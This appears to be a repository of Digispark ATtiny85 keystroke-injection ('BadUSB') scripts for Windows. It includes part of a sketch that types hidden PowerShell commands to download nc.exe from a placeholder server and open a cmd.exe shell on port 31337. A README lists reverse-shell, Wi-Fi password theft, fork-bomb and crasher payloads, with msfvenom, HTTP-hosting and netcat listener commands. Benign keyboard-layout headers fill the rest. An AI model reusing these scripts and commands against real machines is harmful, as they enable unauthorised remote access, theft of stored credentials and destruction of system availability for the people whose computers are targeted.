DigiKeyboard.sendKeyStroke(KEY_ENTER); 54 | DigiKeyboard.delay(1000); 55 | DigiKeyboard.println("powershell -windowstyle hidden Invoke-WebRequest -Uri http://YOURHTTPSERVER/nc.exe -OutFile tester.exe"); 56 | DigiKeyboard.delay(1000); 57 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 58 | DigiKeyboard.delay(500); 59 | DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); 60 | DigiKeyboard.delay(500); 61 | DigiKeyboard.print("powershell"); 62 | DigiKeyboard.delay(500); 63 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 64 | DigiKeyboard.delay(1000); 65 | DigiKeyboard.println("powershell -windowstyle hidden ./tester.exe -Lp 31337 -e cmd.exe"); 66 | DigiKeyboard.delay(1000); 67 | DigiKeyboard.sendKeyStroke(KEY_ENTER); 68 | // 69 | pisca_led(1000); 70 | for(;;){ /*empty*/ } 71 | } 72 | 73 | void pisca_led(int velocidade){ 74 | for (int inicio =1; inicio <= 10; inicio ++) { 75 | digitalWrite(0, HIGH); 76 | digitalWrite(1, HIGH); 77 | DigiKeyboardPtBr.delay(velocidade); 78 | digitalWrite(0, LOW); 79 | digitalWrite(1, LOW); 80 | DigiKeyboardPtBr.delay(velocidade); 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /Z - Libraries/scancode-ascii-table.h: -------------------------------------------------------------------------------- 1 | //ARQUIVO MODIFICADO PARA OPERAR EM ABNT2 2 | //ainda possue problemas com ? e Ç 3 | 4 | 5 | #include 6 | // Lookup table to convert ascii characters in to keyboard scan codes 7 | // Format: most signifficant bit indicates if scan code should be sent with shift modifier 8 | // remaining 7 bits are to be used as scan code number. 9 | 10 | const unsigned char ascii_to_scan_code_table[] PROGMEM = { 11 | // /* ASCII: 0 */ 0, 12 | // /* ASCII: 1 */ 0, 13 | // /* ASCII: 2 */ 0, 14 | // /* ASCII: 3 */ 0, 15 | // /* ASCII: 4 */ 0, 16 | // /* ASCII: 5 */ 0, 17 | // /* ASCII: 6 */ 0, 18 | // /* ASCII: 7 */ 0, 19 | /* ASCII: 8 */ 42, 20 | /* ASCII: 9 */ 43, 21 | /* ASCII: 10 */ 40, 22 | /* ASCII: 11 */ 0, 23 | /* ASCII: 12 */ 0, 24 | /* ASCII: 13 */ 0, 25 | /* ASCII: 14 */ 0, 26 | /* ASCII: 15 */ 0, 27 | /* ASCII: 16 */ 0, 28 | /* ASCII: 17 */ 0, 29 | /* ASCII: 18 */ 0, 30 | /* ASCII: 19 */ 0, 31 | /* ASCII: 20 */ 0, 32 | /* ASCII: 21 */ 0, 33 | /* ASCII: 22 */ 0, 34 | /* ASCII: 23 */ 0, 35 | /* ASCII: 24 */ 0, 36 | /* ASCII: 25 */ 0, 37 | /* ASCII: 26 */ 0, 38 | /* ASCII: 27 */ 41, 39 | /* ASCII: 28 */ 0, 40 | /* ASCII: 29 */ 0, 41 | /* ASCII: 30 */ 0, 42 | /* ASCII: 31 */ 0, 43 | /* ASCII: 32 */ 44, 44 | /* ASCII: 33 */ 158, 45 | /* ASCII: 34 */ 181, 46 | /* ASCII: 35 */ 160, 47 | /* ASCII: 36 */ 161, 48 | /* ASCII: 37 */ 162, 49 | /* ASCII: 38 */ 164, 50 | /* ASCII: 39 */ 53, 51 | /* ASCII: 40 */ 166, 52 | /* ASCII: 41 */ 167, 53 | /* ASCII: 42 */ 165, 54 | /* ASCII: 43 */ 174, 55 | /* ASCII: 44 */ 54, 56 | /* ASCII: 45 */ 45, 57 | /* ASCII: 46 */ 55, 58 | /* ASCII: 47 */ 84, 59 | /* ASCII: 48 */ 39, 60 | /* ASCII: 49 */ 30, 61 | /* ASCII: 50 */ 31, 62 | /* ASCII: 51 */ 32, 63 | /* ASCII: 52 */ 33, 64 | /* ASCII: 53 */ 34, 65 | /* ASCII: 54 */ 35, 66 | /* ASCII: 55 */ 36, 67 | /* ASCII: 56 */ 37, 68 | /* ASCII: 57 */ 38, 69 | /* ASCII: 58 */ 184, 70 | /* ASCII: 59 */ 56, 71 | /* ASCII: 60 */ 182, 72 | /* ASCII: 61 */ 46, 73 | /* ASCII: 62 */ 183, 74 | /* ASCII: 63 */ 0, /* onde esta a ? */ 75 | /* ASCII: 64 */ 159, 76 | /* ASCII: 65 */ 132, 77 | /* ASCII: 66 */ 133, 78 | /* ASCII: 67 */ 134, 79 | /* ASCII: 68 */ 135, 80 | /* ASCII: 69 */ 136, 81 | /* ASCII: 70 */ 137, 82 | /* ASCII: 71 */ 138, 83 | /* ASCII: 72 */ 139, 84 | /* ASCII: 73 */ 140, 85 | /* ASCII: 74 */ 141, 86 | /* ASCII: 75 */ 142, 87 | /* ASCII: 76 */ 143, 88 | /* ASCII: 77 */ 144, 89 | /* ASCII: 78 */ 145, 90 | /* ASCII: 79 */ 146, 91 | /* ASCII: 80 */ 147, 92 | /* ASCII: 81 */ 148, 93 | /* ASCII: 82 */ 149, 94 | /* ASCII: 83 */ 150, 95 | /* ASCII: 84 */ 151, 96 | /* ASCII: 85 */ 152, 97 | /* ASCII: 86 */ 153, 98 | /* ASCII: 87 */ 154, 99 | /* ASCII: 88 */ 155, 100 | /* ASCII: 89 */ 156, 101 | /* ASCII: 90 */ 157, 102 | /* ASCII: 91 */ 48, 103 | /* ASCII: 92 */ 100, 104 | /* ASCII: 93 */ 49, 105 | /* ASCII: 94 */ 180, 106 | /* ASCII: 95 */ 173, 107 | /* ASCII: 96 */ 175, 108 | /* ASCII: 97 */ 4, 109 | /* ASCII: 98 */ 5, 110 | /* ASCII: 99 */ 6, 111 | /* ASCII: 100 */ 7, 112 | /* ASCII: 101 */ 8, 113 | /* ASCII: 102 */ 9, 114 | /* ASCII: 103 */ 10, 115 | /* ASCII: 104 */ 11, 116 | /* ASCII: 105 */ 12, 117 | /* ASCII: 106 */ 13, 118 | /* ASCII: 107 */ 14, 119 | /* ASCII: 108 */ 15, 120 | /* ASCII: 109 */ 16, 121 | /* ASCII: 110 */ 17, 122 | /* ASCII: 111 */ 18, 123 | /* ASCII: 112 */ 19, 124 | /* ASCII: 113 */ 20, 125 | /* ASCII: 114 */ 21, 126 | /* ASCII: 115 */ 22, 127 | /* ASCII: 116 */ 23, 128 | /* ASCII: 117 */ 24, 129 | /* ASCII: 118 */ 25, 130 | /* ASCII: 119 */ 26, 131 | /* ASCII: 120 */ 27, 132 | /* ASCII: 121 */ 28, 133 | /* ASCII: 122 */ 29, 134 | /* ASCII: 123 */ 176, 135 | /* ASCII: 124 */ 228, 136 | /* ASCII: 125 */ 177, 137 | /* ASCII: 126 */ 52 138 | 139 | 140 | }; 141 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 💀 Digispark Attiny85 Scripts for Windows 💀 2 | 3 | ## 📌 About This Repository 4 | 5 | This repository is dedicated to storing scripts for the Digispark Attiny85 while promoting knowledge sharing. The scripts will be updated over time as I gain more experience! 😊 6 | 7 | ⚠ **Disclaimer:** These scripts are for educational purposes only. Use them at your own risk! 8 | 9 | ✅ Compatible with **Windows, Linux, and Termux!** 10 | 11 |

12 | 13 |

14 | 15 | --- 16 | 17 | ## 🚀 Available Scripts 18 | 19 | - **Fakeupdate** 🃏 - Displays a fake Windows update screen. 20 | - **ForkBomb** 💥 - Creates an infinite loop, causing a system crash. 21 | - **Grab-WindowsSysinfo** 👽 - Collects system information. 22 | - **Metasploit-Revshell** 💔 - Reverse shell using Metasploit. 23 | - **Netcat-Revshell** 🐱 - Reverse shell using Netcat. 24 | - **Revshell-ps1** 🐀 - PowerShell-based reverse shell. 25 | - **Steal-Wifi-Passwd** 😈 - Extracts saved Wi-Fi passwords. 26 | - **Wallpaper-Prank** 😵 - Changes desktop wallpaper and hides icons. 27 | - **Windows-Crasher** 💥 - Creates a batch payload to crash Windows. 28 | 29 | --- 30 | 31 | ## 🔧 Dependencies 32 | 33 | To use these scripts, install the following: 34 | 35 | - **Digistump Packages:** [DigistumpArduino](https://github.com/digistump/DigistumpArduino) 36 | - **Digispark ABNT2:** [DigisparkABNT2](https://github.com/jcldf/digisparkABNT2) 37 | - **Arduino IDE:** [Download here](https://www.arduino.cc/en/software) 38 | - **Metasploit Framework:** [Metasploit Website](https://www.metasploit.com) 39 | 40 | --- 41 | 42 | ## 📖 How to Use 43 | 44 | ### 🔹 Fakeupdate 45 | 46 | This script opens a fake Windows update website in full screen. 47 | 48 | **Steps:** 49 | 1. Upload the "Fakeupdate" script to Digispark. 50 | 2. Run it on the target machine. 51 | 52 | --- 53 | 54 | ### 🔹 ForkBomb 55 | 56 | This script runs an infinite loop until the system crashes. 57 | 58 | **Steps:** 59 | 1. Upload the "ForkBomb" script to Digispark. 60 | 2. Run it on the target machine. 61 | 62 | --- 63 | 64 | ### 🔹 Grab-WindowsSysinfo 65 | 66 | This script extracts system information and sends it via a webhook. 67 | 68 | **Steps:** 69 | 1. Replace the webhook URL in the script. 70 | 2. Upload the "Grab-WindowsSysinfo" script to Digispark. 71 | 3. Run it on the target machine. 72 | 73 | --- 74 | 75 | ### 🔹 Metasploit-Revshell 76 | 77 | This script creates a Metasploit reverse shell. 78 | 79 | **Steps:** 80 | 1. Generate a payload: 81 | ```bash 82 | msfvenom --platform windows -p windows/meterpreter/reverse_tcp lhost=YOUR_IP lport=443 -e x86/shikata_ga_nai -i 7 -f exe -o exploit.exe 83 | ``` 84 | 2. Edit `meta.rc` and start Metasploit: 85 | ```bash 86 | msfdb reinit && msfconsole -r meta.rc 87 | ``` 88 | 3. Host the file: 89 | ```bash 90 | python3 -m http.server 80 91 | ``` 92 | 4. Upload the "Metasploit-Revshell" script to Digispark and execute it. 93 | 94 | --- 95 | 96 | ### 🔹 Netcat-Revshell 97 | 98 | This script establishes a reverse shell using Netcat. 99 | 100 | **Steps:** 101 | 1. Start an HTTP server: 102 | ```bash 103 | python3 -m http.server 80 104 | ``` 105 | 2. Listen for the connection: 106 | ```bash 107 | nc -lvnp 443 # Or use ncat/pwncat-cs 108 | ``` 109 | 3. Upload and run the "Netcat-Revshell" script. 110 | 111 | --- 112 | 113 | ### 🔹 Revshell-ps1 114 | 115 | This PowerShell script creates a reverse shell. 116 | 117 | **Steps:** 118 | 1. Upload the .ps1 script to a secret GitHub Gist. 119 | 2. Copy the raw link into the Arduino IDE. 120 | 3. Listen for the connection: 121 | ```bash 122 | nc -lvnp 443 # Or use ncat/pwncat-cs 123 | ``` 124 | 4. Upload and run the "Revshell-ps1" script. 125 | 126 | --- 127 | 128 | ### 🔹 Steal-Wifi-Passwd 129 | 130 | This script extracts saved Wi-Fi passwords and sends them via a webhook. 131 | 132 | **Steps:** 133 | 1. Replace the webhook URL in the script. 134 | 2. Upload and run the "Steal-Wifi-Passwd" script. 135 | 136 | --- 137 | 138 | ### 🔹 Wallpaper-Prank 139 | 140 | This script takes a screenshot of the desktop, sets it as the wallpaper, and hides icons. 141 | 142 | **Steps:** 143 | 1. Upload and run the "Wallpaper-Prank" script. 144 | 145 | --- 146 | 147 | ### 🔹 Windows-Crasher 148 | 149 | This script generates a batch file to crash Windows. 150 | 151 | **Steps:** 152 | 1. Upload and run the "Windows-Crasher" script. 153 | 154 | --- 155 | 156 | ## 🔗 References and Credits 157 | 158 | - [CedArctic](https://github.com/CedArctic/DigiSpark-Scripts) 159 | - [Brunomlima](https://github.com/brunomlima/Digispark) 160 | - [Gadotti](https://github.com/Gadotti/DigisparkScripts) 161 | 162 | --- 163 | 164 | Enjoy experimenting responsibly! 😈 165 | 166 | -------------------------------------------------------------------------------- /Z - Libraries/DigiKeyboardPtBr.h: -------------------------------------------------------------------------------- 1 | // For more scripts checkout: https://github.com/m6sser 2 | // m6sser | 01/02/2023 @14:00 UTC 3 | 4 | #include "DigiKeyboard.h" 5 | #ifndef DIGIKEYBOARDDE_H 6 | #define DIGIKEYBOARDDE_H 7 | 8 | 9 | #define DE_MOD_CONTROL_LEFT (1<<8) 10 | #define DE_MOD_SHIFT_LEFT (1<<9) 11 | #define DE_MOD_ALT_LEFT (1<<10) 12 | #define DE_MOD_GUI_LEFT (1<<11) 13 | #define DE_MOD_CONTROL_RIGHT (1<<12) 14 | #define DE_MOD_SHIFT_RIGHT (1<<13) 15 | #define DE_MOD_ALT_RIGHT (1<<14) 16 | #define DE_MOD_GUI_RIGHT (1<<15) 17 | const uint16_t _ascii_de_map[128] PROGMEM = 18 | { 19 | 0x00, // NUL 20 | 0x00, // SOH 21 | 0x00, // STX 22 | 0x00, // ETX 23 | 0x00, // EOT 24 | 0x00, // ENQ 25 | 0x00, // ACK 26 | 0x00, // BEL 27 | 0x2a, // BS Backspace 28 | 0x2b, // TAB Tab 29 | 0x28, // LF Enter 30 | 0x00, // VT 31 | 0x00, // FF 32 | 0x00, // CR 33 | 0x00, // SO 34 | 0x00, // SI 35 | 0x00, // DEL 36 | 0x00, // DC1 37 | 0x00, // DC2 38 | 0x00, // DC3 39 | 0x00, // DC4 40 | 0x00, // NAK 41 | 0x00, // SYN 42 | 0x00, // ETB 43 | 0x00, // CAN 44 | 0x00, // EM 45 | 0x00, // SUB 46 | 0x00, // ESC 47 | 0x00, // FS 48 | 0x00, // GS 49 | 0x00, // RS 50 | 0x00, // US 51 | 0x2c, // ' ' 52 | 0x1e|DE_MOD_SHIFT_LEFT, // ! 53 | 0x35|DE_MOD_SHIFT_LEFT, //0x1F|DE_MOD_SHIFT_LEFT, // " 54 | 0x20|DE_MOD_SHIFT_LEFT, //0x38, // # 55 | 0x21|DE_MOD_SHIFT_LEFT, // $ 56 | 0x22|DE_MOD_SHIFT_LEFT, // % 57 | 0x24|DE_MOD_SHIFT_LEFT, //0x23|DE_MOD_SHIFT_LEFT, // & 58 | 0x35, //0x32|DE_MOD_SHIFT_LEFT, // ' 59 | 0x26|DE_MOD_SHIFT_LEFT, //0x25|DE_MOD_SHIFT_LEFT, // ( 60 | 0x27|DE_MOD_SHIFT_LEFT, //0x26|DE_MOD_SHIFT_LEFT, // ) 61 | 0x25|DE_MOD_SHIFT_LEFT, //0x30|DE_MOD_SHIFT_LEFT, // * 62 | 0x2E|DE_MOD_SHIFT_LEFT, //0x30, // + 63 | 0x36, // , 64 | 0x2D, //0x38, // - 65 | 0x37, // . 66 | 0x14|DE_MOD_ALT_RIGHT, //0x24|DE_MOD_SHIFT_LEFT, // / 67 | 0x27, // 0 68 | 0x1e, // 1 69 | 0x1f, // 2 70 | 0x20, // 3 71 | 0x21, // 4 72 | 0x22, // 5 73 | 0x23, // 6 74 | 0x24, // 7 75 | 0x25, // 8 76 | 0x26, // 9 77 | 0x38|DE_MOD_SHIFT_LEFT, //0x37|DE_MOD_SHIFT_LEFT, // : 78 | 0x38, //0x36|DE_MOD_SHIFT_LEFT, // ; 79 | 0x36|DE_MOD_SHIFT_LEFT, //0x64, // < 80 | 0x2E, //0x27|DE_MOD_SHIFT_LEFT, // = 81 | 0x37|DE_MOD_SHIFT_LEFT, //0x64|DE_MOD_SHIFT_LEFT, // > 82 | KEY_W|DE_MOD_ALT_RIGHT, //0x2D|DE_MOD_SHIFT_LEFT, // ? 83 | 0x1f|DE_MOD_SHIFT_LEFT, //0x14|DE_MOD_ALT_RIGHT, // @ 84 | 0x04|DE_MOD_SHIFT_LEFT, // A 85 | 0x05|DE_MOD_SHIFT_LEFT, // B 86 | 0x06|DE_MOD_SHIFT_LEFT, // C 87 | 0x07|DE_MOD_SHIFT_LEFT, // D 88 | 0x08|DE_MOD_SHIFT_LEFT, // E 89 | 0x09|DE_MOD_SHIFT_LEFT, // F 90 | 0x0a|DE_MOD_SHIFT_LEFT, // G 91 | 0x0b|DE_MOD_SHIFT_LEFT, // H 92 | 0x0c|DE_MOD_SHIFT_LEFT, // I 93 | 0x0d|DE_MOD_SHIFT_LEFT, // J 94 | 0x0e|DE_MOD_SHIFT_LEFT, // K 95 | 0x0f|DE_MOD_SHIFT_LEFT, // L 96 | 0x10|DE_MOD_SHIFT_LEFT, // M 97 | 0x11|DE_MOD_SHIFT_LEFT, // N 98 | 0x12|DE_MOD_SHIFT_LEFT, // O 99 | 0x13|DE_MOD_SHIFT_LEFT, // P 100 | 0x14|DE_MOD_SHIFT_LEFT, // Q 101 | 0x15|DE_MOD_SHIFT_LEFT, // R 102 | 0x16|DE_MOD_SHIFT_LEFT, // S 103 | 0x17|DE_MOD_SHIFT_LEFT, // T 104 | 0x18|DE_MOD_SHIFT_LEFT, // U 105 | 0x19|DE_MOD_SHIFT_LEFT, // V 106 | 0x1a|DE_MOD_SHIFT_LEFT, // W 107 | 0x1b|DE_MOD_SHIFT_LEFT, // X 108 | 0x1c|DE_MOD_SHIFT_LEFT, //0x1d|DE_MOD_SHIFT_LEFT, // Y 109 | 0x1d|DE_MOD_SHIFT_LEFT, //0x1c|DE_MOD_SHIFT_LEFT, // Z 110 | 0x30, //0x25|DE_MOD_ALT_RIGHT, // [ 111 | 0x64, //0x2d|DE_MOD_ALT_RIGHT, // bslash 112 | 0x32, //0x26|DE_MOD_ALT_RIGHT, // ] 113 | 0x35, // ^ 114 | 0x2D|DE_MOD_SHIFT_LEFT, //0x38|DE_MOD_SHIFT_LEFT, // _ 115 | 0x2E|DE_MOD_SHIFT_LEFT, // ` 116 | 0x04, // a 117 | 0x05, // b 118 | 0x06, // c 119 | 0x07, // d 120 | 0x08, // e 121 | 0x09, // f 122 | 0x0a, // g 123 | 0x0b, // h 124 | 0x0c, // i 125 | 0x0d, // j 126 | 0x0e, // k 127 | 0x0f, // l 128 | 0x10, // m 129 | 0x11, // n 130 | 0x12, // o 131 | 0x13, // p 132 | 0x14, // q 133 | 0x15, // r 134 | 0x16, // s 135 | 0x17, // t 136 | 0x18, // u 137 | 0x19, // v 138 | 0x1a, // w 139 | 0x1b, // x 140 | 0x1c, //0x1d, // y 141 | 0x1d, //0x1c, // z 142 | 0x30|DE_MOD_SHIFT_LEFT, //0x24|DE_MOD_ALT_RIGHT, // { 143 | 0x64|DE_MOD_SHIFT_LEFT, // | 144 | 0x32|DE_MOD_SHIFT_LEFT, //0x27|DE_MOD_ALT_RIGHT, // } 145 | 0x64, //0x30|DE_MOD_ALT_RIGHT, // ~ 146 | 0 // DEL 147 | }; 148 | //0x7C|0x0040, // | 149 | 150 | class DigiKeyboardDevicePtBr : public DigiKeyboardDevice{ 151 | public: 152 | size_t write(uint8_t chr) { 153 | 154 | //çÇ 155 | if (chr == 195) { 156 | sendKeyStroke(0x33); 157 | //sendKeyStroke(0x33, MOD_SHIFT_LEFT); 158 | } 159 | else { 160 | unsigned int temp = pgm_read_word_near(_ascii_de_map + chr); 161 | unsigned char low = temp & 0xFF; 162 | unsigned char high = (temp >> 8) & 0xFF; 163 | sendKeyStroke(low,high); 164 | } 165 | 166 | return 1; 167 | } 168 | void sendKeyReport(uchar *array,const unsigned int size){ 169 | while (!usbInterruptIsReady()) { 170 | // Note: We wait until we can send keyPress 171 | // so we know the previous keyPress was 172 | // sent. 173 | usbPoll(); 174 | _delay_ms(5); 175 | } 176 | 177 | usbSetInterrupt(array, size); 178 | } 179 | }; 180 | DigiKeyboardDevicePtBr DigiKeyboardPtBr = DigiKeyboardDevicePtBr(); 181 | #endif //DIGIKEYBOARDDE_H --------------------------------------------------------------------------------